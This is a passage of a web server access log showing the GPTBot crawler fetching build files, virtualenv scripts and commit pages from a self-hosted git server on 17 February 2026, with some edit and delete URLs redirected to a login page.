(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:17:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:17:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13532] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:17:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12174] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19903] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12171] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19910] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13535] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:02:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:02:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:02:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11762] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" +[17/Feb/2026:17:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" +[17/Feb/2026:17:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fPYZ-00.toc" [Client 74.7.227.38] [Length 20982] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:17:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fPKG-00.toc" [Client 74.7.227.38] [Length 35821] [Gzip 12.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:17:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fPKG-00.toc" [Client 74.7.227.38] [Length 35921] [Gzip 12.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:17:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fPYZ-00.toc" [Client 74.7.227.38] [Length 20983] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:17:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2fEXE-00.toc" [Client 74.7.227.38] [Length 37310] [Gzip 12.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:17:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fEXE-00.toc" [Client 74.7.227.38] [Length 37223] [Gzip 12.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:17:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19899] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" +[17/Feb/2026:17:02:15 +0000] - 200 200 - GET https 